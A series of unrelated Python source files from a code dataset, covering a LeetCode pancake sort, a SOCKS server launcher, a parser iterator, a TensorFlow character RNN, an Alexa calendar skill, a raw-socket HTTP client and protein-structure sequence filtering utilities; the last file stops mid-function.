Pancake Sorting\nhttps://leetcode.com/problems/pancake-sorting/\n\n_author: Kashif Memon\n_python_version: 3.7.2\n\"\"\"\n\n\nclass Solution:\n out = []\n\n def pancakeSort(self, A: 'List[int]') -> 'List[int]':\n if len(A) == 1: return []\n maxValPos = A.index(max(A))\n A = A[:maxValPos + 1][::-1] + A[maxValPos + 1:]\n A = A[::-1]\n return [maxValPos + 1, len(A)] + self.pancakeSort(A[:-1])\n\n # My Solution - Wrong apparently\n def flip(idx=None):\n if idx:\n tmp = A[:idx][::-1]\n return tmp + A[idx:]\n return A[::-1]\n\n if not A: return []\n maxValPos = A.index(max(A)) + 1\n self.out.append(maxValPos)\n A = flip(idx=maxValPos)\n # print(\"i\", A)\n A = flip()\n # print(\"0\", A)\n self.pancakeSort(A[:-1]) + [A[-1]]\n return self.out\n\n\ndef main():\n print(Solution().pancakeSort([1, 2, 3]))\n # print(Solution().pancakeSort([19, 23, 6, 15, 45, 30, 14]))\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"solutions-to-leetcode/969_pancake_sorting.py","file_name":"969_pancake_sorting.py","file_ext":"py","file_size_in_byte":1062,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"101327820","text":"#!/usr/bin/env python\n# coding=utf-8\nimport argparse, logging\nfrom . import serve, logger, Config\nfrom .proxy import SkipPicker\n\nlogger.setLevel(logging.INFO)\nch = logging.StreamHandler()\nch.setLevel(logging.DEBUG)\nfmt = logging.Formatter('%(asctime)s %(levelname)s: %(message)s')\nch.setFormatter(fmt)\nlogger.addHandler(ch)\n\nparser = argparse.ArgumentParser(description = 'HTTP server by Gerald.')\nparser.add_argument('-H', '--host', nargs='*', help='the host of SOCKS server')\nparser.add_argument('-p', '--port', default=1080, help='the port of SOCKS server')\nparser.add_argument('-a', '--auth', nargs=2, action='append', help='username and password pairs')\nparser.add_argument('--versions', nargs='+', help='allowed versions, e.g 4 5')\n\nconfig = Config()\nargs = parser.parse_args()\nif args.host is not None:\n config.host = args.host\nconfig.port = args.port\nif args.auth is not None:\n for user, pwd in args.auth:\n config.set_user(user, pwd)\nif args.versions is not None:\n config.versions = set(args.versions)\nconfig.set_proxies([\n None,\n # ('127.0.0.1', 1080, 5, None, None, True),\n])\nconfig.add_picker(SkipPicker((\n '127.0.0.1',\n 'localhost',\n)))\n\nserve(config)\n","sub_path":"socks/server/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":1192,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"497167571","text":"# ----------------------------------------------------------------------\r\n# |\r\n# | NormalizedIterator.py\r\n# |\r\n# | David Brownell \r\n# | 2021-04-11 12:32:03\r\n# |\r\n# ----------------------------------------------------------------------\r\n# |\r\n# | Copyright David Brownell 2021\r\n# | Distributed under the Boost Software License, Version 1.0. 
See\r\n# | accompanying file LICENSE_1_0.txt or copy at\r\n# | http://www.boost.org/LICENSE_1_0.txt.\r\n# |\r\n# ----------------------------------------------------------------------\r\n\"\"\"Contains the NormalizedIterator object\"\"\"\r\n\r\nimport os\r\n\r\nimport CommonEnvironment\r\n\r\nfrom CommonEnvironmentEx.Package import InitRelativeImports\r\n\r\n# ----------------------------------------------------------------------\r\n_script_fullpath = CommonEnvironment.ThisFullpath()\r\n_script_dir, _script_name = os.path.split(_script_fullpath)\r\n# ----------------------------------------------------------------------\r\n\r\nwith InitRelativeImports():\r\n from .Normalize import LineInfo, NormalizedContent\r\n\r\n# ----------------------------------------------------------------------\r\nclass NormalizedIterator(object):\r\n \"\"\"Object used to iterate through content generated via a call to `Normalize`\"\"\"\r\n\r\n # ----------------------------------------------------------------------\r\n def __init__(\r\n self,\r\n normalized_content: NormalizedContent,\r\n ):\r\n self.Content = normalized_content.Content\r\n self.ContentLen = normalized_content.ContentLen\r\n self.LineInfos = normalized_content.LineInfos\r\n\r\n self._line_info_index = 0\r\n self._offset = 0\r\n\r\n self._last_consumed_dedent_line = None\r\n\r\n # ----------------------------------------------------------------------\r\n def __eq__(self, other):\r\n return self.__dict__ == other.__dict__\r\n\r\n # ----------------------------------------------------------------------\r\n @property\r\n def Line(self) -> int:\r\n \"\"\"Returns the current (1-based) line number\"\"\"\r\n return self._line_info_index + (0 if self.HasTrailingDedents() and self.AtEnd() else 1)\r\n\r\n @property\r\n def Column(self) -> int:\r\n \"\"\"Returns the current (1-based) column number\"\"\"\r\n if self.AtEnd():\r\n return 1\r\n\r\n return self._offset - self.LineInfo.OffsetStart + 1\r\n\r\n @property\r\n def LineInfo(self) -> LineInfo:\r\n \"\"\"Returns the current LineInfo object\"\"\"\r\n assert not self.AtEnd()\r\n return self.LineInfos[self._line_info_index]\r\n\r\n @property\r\n def Offset(self) -> int:\r\n \"\"\"Returns the current offset\"\"\"\r\n return self._offset\r\n\r\n # ----------------------------------------------------------------------\r\n def AtEnd(self) -> bool:\r\n return self._line_info_index == len(self.LineInfos)\r\n\r\n # ----------------------------------------------------------------------\r\n def HasTrailingDedents(self) -> bool:\r\n return bool(\r\n self.LineInfos\r\n and self.LineInfos[-1].HasNewDedents()\r\n and self.LineInfos[-1].OffsetStart == self.LineInfos[-1].OffsetEnd\r\n and self.LineInfos[-1].OffsetStart == self.LineInfos[-1].StartPos\r\n and self.LineInfos[-1].OffsetEnd == self.LineInfos[-1].EndPos\r\n )\r\n\r\n # ----------------------------------------------------------------------\r\n def AtTrailingDedents(self) -> bool:\r\n return self.HasTrailingDedents() and self._line_info_index == len(self.LineInfos) - 1\r\n\r\n # ----------------------------------------------------------------------\r\n def HasConsumedDedents(self):\r\n \"\"\"\\\r\n Returns True if the dedents on the current line have been consumed.\r\n\r\n Dedents on lines without a prefix are troublesome, as there isn't any\r\n way to indicate that they have already been consumed. 
Because of this,\r\n we can find ourselves in an infinite loop when attempting to consume\r\n a dedent like this over and over.\r\n\r\n Maintain the line of the last dedent consumed so that we can determine\r\n if the dedent should be ignored.\r\n \"\"\"\r\n\r\n return not self.LineInfo.HasNewDedents() or self._last_consumed_dedent_line == self._line_info_index\r\n\r\n # ----------------------------------------------------------------------\r\n def ConsumeDedents(self):\r\n assert self.LineInfo.HasNewDedents()\r\n assert self._last_consumed_dedent_line != self._line_info_index\r\n\r\n self._last_consumed_dedent_line = self._line_info_index\r\n\r\n # ----------------------------------------------------------------------\r\n def IsBlankLine(self) -> bool:\r\n \"\"\"Returns True if the offset is positioned at the beginning of a blank line\"\"\"\r\n\r\n # We don't have any line when we are at the end, so we can't have\r\n # a blank line.\r\n if self.AtEnd():\r\n return False\r\n\r\n # The trailing dedents line should not be considered a blank line\r\n if (\r\n self._line_info_index == len(self.LineInfos) - 1\r\n and self.HasTrailingDedents()\r\n ):\r\n return False\r\n\r\n info = self.LineInfo\r\n return info.EndPos == info.StartPos\r\n\r\n # ----------------------------------------------------------------------\r\n def SkipLine(self):\r\n info = self.LineInfo\r\n\r\n self._offset = info.OffsetEnd\r\n\r\n return self.Advance(1)\r\n\r\n # ----------------------------------------------------------------------\r\n def SkipPrefix(self):\r\n offset = self.Offset\r\n info = self.LineInfo\r\n\r\n assert offset == info.OffsetStart\r\n\r\n delta = info.StartPos - info.OffsetStart\r\n if delta == 0:\r\n return self\r\n\r\n return self.Advance(delta)\r\n\r\n # ----------------------------------------------------------------------\r\n def SkipSuffix(self):\r\n offset = self.Offset\r\n info = self.LineInfo\r\n\r\n assert offset == info.EndPos\r\n\r\n delta = info.OffsetEnd - info.EndPos\r\n if delta == 0:\r\n return self\r\n\r\n return self.Advance(delta)\r\n\r\n # ----------------------------------------------------------------------\r\n def Advance(\r\n self,\r\n delta: int,\r\n ):\r\n info = self.LineInfo\r\n offset = self.Offset\r\n\r\n if offset == info.OffsetEnd:\r\n if (\r\n self._line_info_index + 1 == len(self.LineInfos)\r\n and self.HasTrailingDedents()\r\n ):\r\n assert delta == 0, delta\r\n else:\r\n assert delta == 1, delta\r\n\r\n if not self.AtEnd():\r\n self._line_info_index += 1\r\n\r\n else:\r\n assert offset >= info.OffsetStart and offset <= info.OffsetEnd, (offset, info)\r\n assert offset + delta <= info.OffsetEnd, (delta, offset, info)\r\n assert (\r\n offset >= info.StartPos\r\n or (offset == info.OffsetStart and offset + delta == info.StartPos)\r\n ), (offset, info)\r\n\r\n self._offset += delta\r\n\r\n return self\r\n\r\n # ----------------------------------------------------------------------\r\n def Clone(self):\r\n # Dynamically created the NormalizedContent object\r\n result = self.__class__(\r\n NormalizedContent(\r\n self.Content,\r\n self.ContentLen,\r\n self.LineInfos,\r\n ),\r\n )\r\n\r\n result._offset = self._offset # pylint: disable=W0212\r\n result._line_info_index = self._line_info_index # pylint: disable=W0212\r\n result._last_consumed_dedent_line = self._last_consumed_dedent_line # pylint: disable=W0212\r\n\r\n return 
result\r\n","sub_path":"src/TheLanguage/ParserImpl/NormalizedIterator.py","file_name":"NormalizedIterator.py","file_ext":"py","file_size_in_byte":8050,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"593511977","text":"from immagini import *\r\nimport sys\r\nsys.setrecursionlimit(1000)\r\n\r\ndef formatta(elem, destra, sotto):\r\n if destra >= elem and sotto >= elem:\r\n return elem + 1\r\n return formatta(elem-1, destra, sotto)\r\n\r\ndef init(img, c):\r\n for i,y in enumerate(img):\r\n for k,x in enumerate(y):\r\n if x != c:\r\n img[i][k] = 0\r\n else:\r\n img[i][k] = 1\r\n return img\r\n\r\ndef res(img):\r\n l = 0\r\n ind = 0\r\n for i,x in enumerate(img):\r\n if max(x) > l:\r\n l = max(x)\r\n ind = i\r\n return l, (img[ind].index(l)-l+1, ind-l+1)\r\n\r\ndef quadrato(filename, c):\r\n png = load(filename)\r\n img = init(png, c)\r\n l = (0, (0, 0))\r\n for i,y in enumerate(img[:-1]):\r\n for k,x in enumerate(y[:-1]):\r\n if x != 0:\r\n destra = img[i][k+1]\r\n sotto = img[i+1][k]\r\n diagonale = img[i+1][k+1]\r\n if diagonale != 0 and destra != 0 and sotto != 0:\r\n img[i+1][k+1] = formatta(x, destra, sotto)\r\n return res(img)\r\n","sub_path":"students/1795119/homework03/program01.py","file_name":"program01.py","file_ext":"py","file_size_in_byte":1083,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"624177099","text":"import tensorflow as tf\nimport numpy as np\n\ndef download_data(url, filename, work_directory):\n from six.moves.urllib.request import urlretrieve\n import os\n if not os.path.exists(work_directory):\n os.mkdir(work_directory)\n filepath = os.path.join(work_directory, filename)\n if not os.path.exists(filepath):\n filepath, _ = urlretrieve(url, filepath)\n statinfo = os.stat(filepath)\n print('Succesfully downloaded', filename, statinfo.st_size, 'bytes.')\n return filepath\n\ndownload_data(\"https://raw.githubusercontent.com/sherjilozair/char-rnn-tensorflow/master/data/tinyshakespeare/input.txt\", \"tinyshakespeare.txt\", \"tinyshakespeare_data\")\n\nwith open(\"tinyshakespeare_data/tinyshakespeare.txt\") as f:\n data = f.read()\n data = \"\".join(data.split())\n\n def split(s, chunk_size):\n a = zip(*[s[i::chunk_size] for i in range(chunk_size)])\n return [''.join(t) for t in a]\n\n strings = split(data, 20)\n strings = strings[:1000]\n char_rdic = list(set(data))\n\n#char_rdic = [chr(ch) for ch in range(ord('a'), ord('z')+1)] # id -> char\nchar_dic = {w: i for i, w in enumerate(char_rdic)} # char -> id\n\n# to index\n#strings = [\"helloworld\", \"machinegun\", \"tensorflow\"]\n\nsamples = [[char_dic[ch] for ch in string] for string in strings]\n\n\"\"\"\nx_data = np.array([ [1,0,0,0,0,0,0], # h\n [0,1,0,0,0,0,0], # e\n [0,0,1,0,0,0,0], # l\n [0,0,1,0,0,0,0], # l\n [0,0,0,1,0,0,0], # o\n [0,0,0,0,1,0,0], # w\n [0,0,0,1,0,0,0], # o\n [0,0,0,0,0,1,0], # r\n [0,0,1,0,0,0,0]], # l\n dtype='f')\n\"\"\"\nx_data = [tf.one_hot(sample[:-1], len(char_dic), 1.0, 0.0, -1) for sample in samples]\n\nprint(\"YES!\")\n\n# Configuration\nrnn_size = len(char_dic)\ntime_step_size = len(samples[0])-1 # 'helloworl' -> predict 'elloworld'\nbatch_size = len(strings)\n\n# RNN model\nrnn_cell = tf.nn.rnn_cell.BasicRNNCell(rnn_size)\nstate = tf.zeros([batch_size, rnn_cell.state_size])\nprint(x_data)\nX_split = tf.split(1, time_step_size, x_data)\nprint(X_split)\nX_split = [tf.reshape(x, shape=[batch_size, len(char_dic)]) for x in 
X_split]\nprint(X_split)\n\nprint(\"..................\")\n\noutputs, state = tf.nn.rnn(rnn_cell, X_split, state)\nprint (state)\nprint (outputs)\n\nprint(\"----------------\")\n\n# logits: list of 2D Tensors of shape [batch_size x num_decoder_symbols].\n# targets: list of 1D batch-sized int32 Tensors of the same length as logits.\n# weights: list of 1D batch-sized float-Tensors of the same length as logits.\nlogits = outputs\ntargets = np.transpose([sample[1:] for sample in samples])\ntargets = [tf.reshape(target, [-1]) for target in targets]\nweights = [tf.ones(shape=[batch_size]) for _ in range(time_step_size)]\n\nprint(logits)\nprint(targets)\nprint(weights)\n\nloss = tf.nn.seq2seq.sequence_loss_by_example(logits, targets, weights)\ncost = tf.reduce_mean(tf.reduce_sum(loss))\ntrain_op = tf.train.RMSPropOptimizer(0.01, 0.9).minimize(cost)\n\nprint(\"======== T R A I N ========\")\n\n# Launch the graph in a session\nwith tf.Session() as sess:\n # you need to initialize all variables\n tf.initialize_all_variables().run()\n for epoch in range(2000):\n sess.run(train_op)\n results = sess.run(tf.arg_max(logits, 2))\n results = np.transpose(results)\n print(\"Epoch\", epoch, \"----\")\n results = results[:20]\n for result in results:\n print (\"\\t\", ''.join([char_rdic[t] for t in result]))","sub_path":"tinyshakespeare/simple-rnn.py","file_name":"simple-rnn.py","file_ext":"py","file_size_in_byte":3536,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"191745362","text":"from datetime import datetime, timedelta\nfrom urllib import request\nimport json\n# changed the next import so that lambda_function needn't know the internal\n# organization of the libeary package\nfrom libeary import ABEEvent, AVSIntent\n\n\ndef lambda_handler(req, context):\n \"\"\"\n Entry function (called by AWS)\n :param req: a dictionary with the JSON values sent from AVS\n :param context: don't know what this is\n :return: a dictionary (to be formatted as a JSON string)\n \"\"\"\n\n # Convert the server request to an AVSIntent object\n intent = AVSIntent(req)\n\n # Check if the user just opened the Skill (without specifying any actions)\n if intent.is_launch_request:\n return prepare_response('Welcome to the ABE, the Olin calendar. How may I help you?')\n\n # Check if the user wants to know what's happening next\n elif intent.name == 'WhatsHappeningNext':\n return handle_whats_happening_next_request(intent)\n\n # Check if the user wants to know what featured events are happening next\n elif intent.name == 'WhatsHappeningNextFeatured':\n return handle_whats_happening_next_request(intent, 'featured')\n\n elif intent.name == 'WhatsHappeningOn': # Look up what's happening on/at a specific day/time\n return handle_whats_happening_on_request(intent)\n\n # There was a problem interpreting the intent\n # This is a developer-centered message. Consider wording aimed at the user\n # of the system.\n # Stretch: log errors for analysis as to popular unrecognized intents to\n # implement next. (Maybe AWS already has a mechanism for this?)\n return prepare_response(\"I didn't recognize the intent \" + intent.name)\n\n\ndef handle_whats_happening_next_request(intent, labels=None):\n \"\"\"\n This function queries ABE for events happening in the next week. 
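(It simply calls get_events below with a window from now until one week out.) 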
It handles the \"WhatsHappeningNext\" request from AVS.\n :param {AVSIntent} intent: the intent from AVS\n :param {list} labels: a list of labels to filter events by\n :return {list}: the events found in the next week\n \"\"\"\n # Resolve the dates to look between\n today = datetime.now()\n # timedelta is a good candidate for (1) a global, or (2) a configurable\n # global, e.g. via an environment variable. The admin documentation can\n # document configuration options, and whether they're found in the code or\n # in the enviornment.\n week_from_today = today + timedelta(weeks=1)\n\n # Get the events\n events = get_events(start=today, end=week_from_today, labels=labels)\n # If there is an error, consider reporting this fact to the user so they\n # don't erroneously think nothing is scheduled. (This is less critical\n # with current uses of ABE. It could be more critical if you were\n # relying on the skill to tell you, say, your next class or due date.)\n if events is None: # Make sure there wasn't an error talking to ABE\n return prepare_abe_connectivity_problem_response()\n\n # Build the response\n text_res = 'I found {} events coming up on the Olin calendar in the next week.'.format(len(events))\n # In Python 3.6, you can also say f'I found #{len(events)} events…'\n for event in events:\n text_res += \" {}, there's {} {}.\".format(event.get_start_speech(),\n event.title, 'in ' + event.location if event.location else '')\n\n return prepare_response(text_res)\n\n\ndef handle_whats_happening_on_request(intent):\n \"\"\"\n This function queries ABE for events happening on a specific date. It handles the \"WhatsHappeningOn\" intent from AVS.\n :param {AVSIntent} intent: the intent from AVS\n :return {list}: the events found on the given date\n \"\"\"\n # Convert intent date to Python date\n date = intent.slots['date'].value\n # '%Y-%m-%d' looks like it's defined by the skill. Does the skill\n # documentation give this format a name that you can use as a global\n # variable, for documentation as to where the string is coming from /\n # what it means? You could define this in libeary, to move more AWS\n # specifics there.\n date = datetime.strptime(date, '%Y-%m-%d')\n tomorrow_morning = date + timedelta(days=1) # The end time for our query\n\n # Get the events\n events = get_events(start=date, end=tomorrow_morning)\n # Same as previous comment. 
Which suggests factoring the common code from\n # handle_whats_happening_next_request and handle_whats_happening_on_request.\n # Also (now that I see this a second time), it would make sense for\n # get_events to raise an error instead of return None, as a more\n # conventional means to signal an exception, that also forces the caller\n # to think through how to handle this case.\n if events is None: # Make sure there wasn't an error talking to ABE\n return prepare_abe_connectivity_problem_response()\n\n # Build the response\n date_as_words = date.strftime('%A, %B %d')\n count = len(events)\n text_res = 'I found {} event{} on {}.'.format(\n 'no' if count == 0 else count, '' if count == 1 else 's', date_as_words)\n for event in events:\n text_res += \" {}, there's {} {}.\".format(event.get_start_speech(),\n event.title, 'in ' + event.location if event.location else '')\n\n return prepare_response(text_res)\n\n\ndef prepare_abe_connectivity_problem_response():\n \"\"\"\n Generates a response to send to AVS indicating there was a problem talking to ABE.\n :return {dict}: a response to be sent back to AVS\n \"\"\"\n # This is a good example of a user-oriented solution message. In an actual\n # deployment, this needs to go in a context of how to find said overlord.\n return prepare_response('There was a problem speaking to ABE. Please contact your Library Overlord.')\n\n\ndef get_events(start=None, end=None, labels=None):\n \"\"\"\n Makes any necessary HTTP requests and does any filtering necessary to get events from ABE.\n :param {datetime} start: (optional) the first day to fetch events for\n :param {datetime} end: (optional) the last day to fetch events for\n :param {list} labels: (optional) a list of tags to filter results based on\n :return {list}: the events found\n \"\"\"\n # [Not part of this goal] TODO replace by a logging command\n print('Getting events between {} and {}'.format(start, end))\n # Make an HTTP request to ABE\n request_url = 'https://abe-dev.herokuapp.com/events/' # TODO Load this from an environment variable\n # It looks like this will do the wrong thing if one of start and end is defined and the other\n # is none, so add an assert for that, e.g.\n # assert (start and end) or (not start and not end)\n # or the more cryptic:\n # assert bool(start) == bool(end)\n if start and end: # If we're searching within a specific range, add that to the GET parameters\n request_url += '?start={}&end={}'.format(format_date_url(start), format_date_url(end))\n\n # Put as little as possible inside a `try` block. In this case, just the\n # call to `json.loads`.\n try:\n with request.urlopen(request.Request(request_url)) as res:\n # Parse the server response TODO Error checking\n res = res.read().decode()\n if res.startswith('[]'): # TODO Why is this necessary????\n print('Found 0 events')\n return [] # No events found\n print('Found some events:', res)\n result = json.loads(res)\n # Similarly, catch as narrow an exception as possible. 
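(Here that would mean keeping only the json.loads call inside the try block.) 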
As originally,\n    # written, this will catch network connection errors, server errors, and\n    # program errors in the block above, and disguise them all as parse errors.\n    except json.JSONDecodeError as e:\n        # Consider logging and then re-raising the error, so that the caller\n        # receives this as an error instead of checking for None.\n        print('Error parsing response from ABE')\n        print(e)\n        return None # Some error talking to ABE\n\n    # Convert the result into the format we want\n    events = []\n    for item in result:\n        # Convert JSON into an event object\n        # Use a different variable for a different value type.\n        event = ABEEvent(item)\n        # Filter, if necessary TODO ABE does this\n        if labels:\n            if event.has_labels(labels):\n                events.append(event)\n        else: # Filtering not necessary\n            events.append(event)\n    # Can also do something like:\n    # events = [ABEEvent(event) for event in result]\n    # if labels:\n    #     events = [event for event in events if event.has_labels(labels)]\n    # This is a matter of taste.\n\n    return events\n\n\ndef format_date_url(date, fmt='%Y-%m-%d'):\n    \"\"\"\n    Formats a date as a string for making ABE requests.\n    :param {datetime} date: the date to format\n    :param {str} fmt: the format to use (defaults to YYYY-MM-dd)\n    :return: the date in the specified string format\n    \"\"\"\n    return date.strftime(fmt)\n\n\ndef prepare_response(text):\n    \"\"\"\n    Generates a response object to be sent to AVS.\n    :param text: the text for Alexa to speak\n    :return {dict}: the result to send back to AVS\n    \"\"\"\n    return {\n        'version': '1.0',\n        'response': {\n            'outputSpeech': {\n                'type': 'PlainText',\n                'text': text,\n            }\n        }\n    }\n","sub_path":"lambda_function.py","file_name":"lambda_function.py","file_ext":"py","file_size_in_byte":9384,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
+{"seq_id":"408771647","text":"# coding = utf-8\nimport re\nimport signal\nimport socket\nimport sys\n\n\n# Handle the ctrl+c signal here (so ctrl+c exits cleanly)\ndef handle_int(signum, handler):\n    print('program interrupted, exiting; signal: %d' % signum, 'handler: {}'.format(handler))\n    client_socket.close()\n    sys.exit(0)\n\n\n# Bind the handler for the ctrl+c signal\nsignal.signal(signalnum=signal.SIGINT, handler=handle_int)\n\n\nserver_name = 'www.huanqiu.com'\n# Resolve the IP address (this step is not strictly required)\nlist_info = socket.getaddrinfo(\n    host=server_name,\n    port=80,\n    family=socket.AF_INET,\n    type=socket.SOCK_STREAM,\n    proto=socket.IPPROTO_TCP,\n    flags=socket.AI_ALL) # one of the socket.AI_*** flags\nfor _, _, _, _, address in list_info:\n    print('IP:%s,PORT:%d' % address)\n\n# Create the socket\nclient_socket = socket.socket(\n    socket.AF_INET, # address family: usually the internet address format (IP address)\n    socket.SOCK_STREAM, # communication style: stream or datagram\n    socket.IPPROTO_TCP) # protocol: the packet format\n\n# Connect to the server (using the first INET address resolved above)\nprint(list_info[0][-1])\nclient_socket.connect(list_info[0][-1]) # no return value, so exceptions must be handled; this call is easily interrupted by a signal\n\n# Send the data\nrequest_string = ''\nrequest_string += 'GET / HTTP/1.1\\r\\n'\nrequest_string += 'Host: %s:9999\\r\\n' % server_name # can be replaced with the IP address\nrequest_string += 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\\r\\n'\nrequest_string += 'Upgrade-Insecure-Requests: 1\\r\\n'\nrequest_string += 'Cookie: _xsrf=2|f877d065|146c6a9838e67ba203776913fae34f45|1547796259\\r\\n'\nrequest_string += 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15\\r\\n'\nrequest_string += 'Accept-Language: zh-cn\\r\\n'\n# request_string += 'Accept-Encoding: gzip, deflate\\r\\n'\nrequest_string += 'Connection: keep-alive\\r\\n'\nrequest_string += '\\r\\n'\nrequest_string += '\\r\\n'\n\nbytes_num = client_socket.send(request_string.encode('UTF-8'))\nprint('bytes sent successfully: %d' % bytes_num)\n\n# Receive the protocol header of the server response\nheader_buffers = b''\nwhile True:\n    # read one byte at a time\n    buffer = client_socket.recv(1, 0) # MSG_** flags, etc.\n    header_buffers += buffer\n    # check whether the last four bytes are '\\r\\n\\r\\n', which means the response header is complete\n    last_four_bytes = header_buffers[-4:] # take the last four bytes\n    if last_four_bytes == b'\\r\\n\\r\\n':\n        break # end of header\n\n# Convert the bytes to a string\nheader_string = header_buffers.decode('utf-8')\nprint('response header:\\n', header_string)\n# Get the length of the response body\nregex = r'Content-Length: (\\d*?)\\r\\n'\nlen_content = re.findall(regex, header_string, re.MULTILINE)\nlen_content = int(len_content[0])\nprint('response body length: {}'.format(len_content))\n\n# Now read the response body\nbody_buffers = b''\nwhile True:\n    buffer = client_socket.recv(1024 * 10, 0) # MSG_** flags, etc.\n    body_buffers += buffer\n    if len(body_buffers) == len_content:\n        break\n\nprint('finished reading the response body!')\nbody_string = body_buffers.decode('utf-8')\n# print(body_string)\n","sub_path":"day04/codes/c02_browserclient.py","file_name":"c02_browserclient.py","file_ext":"py","file_size_in_byte":3141,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
+{"seq_id":"214698625","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\nclass ByExp:\n    def __init__(self, T=1000, dt=0.1):\n        self.T = T\n        self.dt = dt\n        self.time_seq = np.arange(0, T, dt)\n        self.allsteps = len(self.time_seq)\n\n    def _biexp_func(self, t, Asyn, t_fall, t_rise):\n        if t < 0:\n            res = 0\n        else:\n            res = Asyn * (np.exp(-t / t_fall) - np.exp(-t / t_rise))\n        return res\n\n\ndef main():\n    c = ByExp()\n    AMPA = np.zeros(c.allsteps)\n    NMDA = np.zeros(c.allsteps)\n    for i in range(0, c.allsteps):\n        AMPA[i] = c._biexp_func(c.time_seq[i], 1.0, 5, 0.8)\n        NMDA[i] = c._biexp_func(c.time_seq[i], 1.0, 125, 20)\n\n    fig = plt.figure(figsize=(16, 12))\n    ax = fig.add_subplot(111)\n    ax.plot(c.time_seq, AMPA, label='AMPA', color='darkcyan')\n    ax.plot(c.time_seq, NMDA, label='NMDA', color='darkmagenta')\n    plt.show()\n\n\nif __name__ == '__main__':\n    main()\n","sub_path":"modular/bi_exp_test.py","file_name":"bi_exp_test.py","file_ext":"py","file_size_in_byte":927,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
+{"seq_id":"243954833","text":"import os, sys, re\nfrom math import *\nimport numpy\nfrom prody import *\nfrom General import *\nfrom PDB import *\nfrom Master import *\n\ndef simpleIdentity(seq1, seq2, unnat = False):\n    '''seq1 and seq2 are three-letter sequences separated by space;\n    if unnat is False, will not distinguish unnatural aa and its natural aa\n    for example, MET and MSE will be considered to be same\n    '''\n    s1 = seq1.split()\n    s2 = seq2.split()\n    same = 0\n    if len(s1) != len(s2):\n        return -1 # -1 is sign of error\n    for i in range(len(s1)):\n        if unnat == False:\n            r1 = t2s(s1[i])\n            r2 = t2s(s2[i])\n            if r1 == r2:\n                same += 1\n        else:\n            if s1[i] == s2[i]:\n                same += 1\n    return float(same)/len(s1)\n\ndef trimByRMSD (input, coln, inhead, outhead, rcut, sorted = True, homo = None, homo_log = False):\n    ''' the input file, can be either .match file or .seq file\n     the column in the input file to look for rmsd values, from zero\n     the header of the input file name, which is unique to procedure.\n    for example, the header for 'uniq_bbrmsd1_rmsd0.8_1A2P_AA32_1.match' is 'uniq_bbrmsd1_rmsd0.8'\n     the header of the output file to replace the input header\n     the rmsd cutoff\n     if true, assume the column is sorted, and exit the function for the first time when the cutoff is exceeded. 
This saves some time\n if not None, it should be a list which contains the pdb-id to be excluded\n if True, write a file about the number of excluded hits\n '''\n ext = getExt(input)\n if ext != ('match' or 'seq'):\n raise myerror('Input not correctly provided...' + input)\n if ext == 'match':\n match = input\n seq = changeExt(input,'seq')\n else:\n seq = input\n match = changeExt(input, 'match')\n # need both .match and .seq files\n if (os.path.isfile(match) == False) or (os.path.isfile(seq) == False):\n raise myerror('Input file does not exist...' + input)\n \n fi_m = open(match)\n fi_s = open(seq)\n fo_m = open(match.replace(inhead, outhead), 'w') # output files\n fo_s = open(seq.replace(inhead, outhead), 'w')\n \n Ne = 0 # number of excluded lines by homo\n for line in fi_m:\n sline = fi_s.readline()\n rmsd = float(line.split()[coln])\n \n # parse the hit from match line\n if homo != None: # skip if pdb_id of a hit is in homolog list\n pid = getBase( removePath( line.split()[1] ) )\n if pid in homo:\n Ne += 1\n continue\n if rmsd <= rcut:\n fo_m.write(line)\n fo_s.write(sline)\n elif sorted == True:\n fo_m.close()\n fo_s.close()\n break\n \n if (homo != None) and (homo_log == True):\n logf = changeExt(match, 'log').replace(inhead, outhead)\n log = open(logf, 'w')\n log.write(str(Ne) + ' homologs excluded from ' + match +'\\n')\n log.close()\n \n return outhead # don't have to always use the return value\n\ndef underRMSD(col, cut, sorted = True):\n '''return the number of sequence under a certain rmsd in a .seq file\n '''\n i = -1\n if sorted == False:\n col.sort(key = float)\n for i in range(len(col)):\n if float(col[i]) > cut:\n return i\n return i+1 # if all sequence in the file are under the cutoff\n\ndef rmsdOfnseq(col, n, sorted = True):\n '''return the maximum rmsd in the top n sequences\n also returns n. if n is larger than the length of sequence file, modify the value of n\n '''\n if sorted == False:\n col.sort(key = float)\n n = min(n, len(col))\n return [col[n-1], n]\n\ndef trimByUniqSeq (seqf, inhead, outhead, nativeSeq = None, homo = None, unnat = False, homo_log = False):\n '''only keep unique sequences in .seq file, also trim corresponding .match file\n the .seq file\n the header of the input file name, which is unique to procedure.\n the header of output file name\n Native sequence is provided as a string of three letters. \n If provided, skip when the hit sequence is equal to native sequence.\n if not None, it should be a list which contains the pdb-id to be excluded\n if False, do not distinguish aa and its variant. \n For example, MET and MSE are not unique.\n if True, write a file about the number of excluded hits\n\n '''\n if getExt(seqf) != 'seq':\n raise myerror('Input not correctly provided...' + seqf)\n match = changeExt(seqf,'match')\n if (os.path.isfile(match) == False) or (os.path.isfile(seqf) == False):\n raise myerror('Input file does not exist...' 
